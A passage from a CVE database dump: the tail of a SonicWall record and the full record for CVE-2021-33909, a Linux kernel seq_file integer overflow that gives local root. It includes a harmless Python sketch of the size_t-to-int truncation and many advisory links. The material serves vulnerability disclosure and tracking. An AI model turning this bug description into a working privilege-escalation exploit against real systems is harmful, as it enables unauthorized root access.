        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006",
              "refsource": "CONFIRM",
              "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2020-5132",
    "datePublished": "2020-09-30T05:25:11",
    "dateReserved": "2019-12-31T00:00:00",
    "dateUpdated": "2024-08-04T08:22:08.680Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-33909
Vulnerability from cvelistv5
Published: 2021-07-20 18:01
Modified: 2024-08-04 00:05
Summary: fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.
References:
https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html (mailing-list, x_refsource_MLIST)
https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html (mailing-list, x_refsource_MLIST)
https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html (mailing-list, x_refsource_MLIST)
https://www.debian.org/security/2021/dsa-4941 (vendor-advisory, x_refsource_DEBIAN)
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/ (vendor-advisory, x_refsource_FEDORA)
http://www.openwall.com/lists/oss-security/2021/07/22/7 (mailing-list, x_refsource_MLIST)
http://www.openwall.com/lists/oss-security/2021/08/25/10 (mailing-list, x_refsource_MLIST)
http://www.openwall.com/lists/oss-security/2021/09/17/2 (mailing-list, x_refsource_MLIST)
http://www.openwall.com/lists/oss-security/2021/09/17/4 (mailing-list, x_refsource_MLIST)
http://www.openwall.com/lists/oss-security/2021/09/21/1 (mailing-list, x_refsource_MLIST)
https://www.oracle.com/security-alerts/cpujan2022.html (x_refsource_MISC)
https://www.openwall.com/lists/oss-security/2021/07/20/1 (x_refsource_MISC)
https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b (x_refsource_CONFIRM)
https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4 (x_refsource_CONFIRM)
http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html (x_refsource_MISC)
http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html (x_refsource_MISC)
https://security.netapp.com/advisory/ntap-20210819-0004/ (x_refsource_CONFIRM)
http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html (x_refsource_MISC)
http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html (x_refsource_MISC)
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015 (x_refsource_CONFIRM)
Impacted products: n/a
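The description pinpoints the bug class: a seq buffer size that is legal as an unsigned size_t but overflows once forced through a signed 32-bit int. The Python sketch below reproduces only that arithmetic, not the kernel code path.

# Hedged illustration of the CVE-2021-33909 ("Sequoia") failure mode:
# an allocation size that is valid as an unsigned size_t turns negative
# when implicitly converted to a signed 32-bit int in C.

def as_signed_int32(size: int) -> int:
    """Mimic C's implicit size_t -> int truncation (two's complement)."""
    v = size & 0xFFFFFFFF
    return v - (1 << 32) if v >= (1 << 31) else v

if __name__ == "__main__":
    # A seq_file buffer doubled past 2 GiB: fine as size_t, negative as int.
    size = 1 << 31  # 2 GiB
    print(f"as size_t: {size}  as int: {as_signed_int32(size)}")
    # prints: as size_t: 2147483648  as int: -2147483648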


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T00:05:52.143Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-2] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
          },
          {
            "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
          },
          {
            "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2714-1] linux-4.19 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
          },
          {
            "name": "DSA-4941",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2021/dsa-4941"
          },
          {
            "name": "FEDORA-2021-07dc0b3eb1",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/"
          },
          {
            "name": "[oss-security] 20210722 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
          },
          {
            "name": "[oss-security] 20210825 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
          },
          {
            "name": "[oss-security] 20210916 Containers-optimized OS (COS) membership in the linux-distros list",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
          },
          {
            "name": "[oss-security] 20210917 Re: Containers-optimized OS (COS) membership in the linux-distros list",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
          },
          {
            "name": "[oss-security] 20210920 Re: Containers-optimized OS (COS) membership in the linux-distros list",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-09T21:06:18",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-2] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
        },
        {
          "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
        },
        {
          "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2714-1] linux-4.19 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
        },
        {
          "name": "DSA-4941",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2021/dsa-4941"
        },
        {
          "name": "FEDORA-2021-07dc0b3eb1",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/"
        },
        {
          "name": "[oss-security] 20210722 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
        },
        {
          "name": "[oss-security] 20210825 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
        },
        {
          "name": "[oss-security] 20210916 Containers-optimized OS (COS) membership in the linux-distros list",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
        },
        {
          "name": "[oss-security] 20210917 Re: Containers-optimized OS (COS) membership in the linux-distros list",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
        },
        {
          "name": "[oss-security] 20210920 Re: Containers-optimized OS (COS) membership in the linux-distros list",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-33909",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-2] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
            },
            {
              "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-1] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
            },
            {
              "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2714-1] linux-4.19 security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
            },
            {
              "name": "DSA-4941",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2021/dsa-4941"
            },
            {
              "name": "FEDORA-2021-07dc0b3eb1",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/"
            },
            {
              "name": "[oss-security] 20210722 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
            },
            {
              "name": "[oss-security] 20210825 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
            },
            {
              "name": "[oss-security] 20210916 Containers-optimized OS (COS) membership in the linux-distros list",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
            },
            {
              "name": "[oss-security] 20210917 Re: Containers-optimized OS (COS) membership in the linux-distros list",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
            },
            {
              "name": "[oss-security] 20210920 Re: Containers-optimized OS (COS) membership in the linux-distros list",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
            },
            {
              "name": "https://www.oracle.com/security-alerts/cpujan2022.html",
              "refsource": "MISC",
              "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
            },
            {
              "name": "https://www.openwall.com/lists/oss-security/2021/07/20/1",
              "refsource": "MISC",
              "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
            },
            {
              "name": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b",
              "refsource": "CONFIRM",
              "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
            },
            {
              "name": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4",
              "refsource": "CONFIRM",
              "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4"
            },
            {
              "name": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20210819-0004/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
            },
            {
              "name": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html"
            },
            {
              "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015",
              "refsource": "CONFIRM",
              "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-33909",
    "datePublished": "2021-07-20T18:01:34",
    "dateReserved": "2021-06-07T00:00:00",
    "dateUpdated": "2024-08-04T00:05:52.143Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}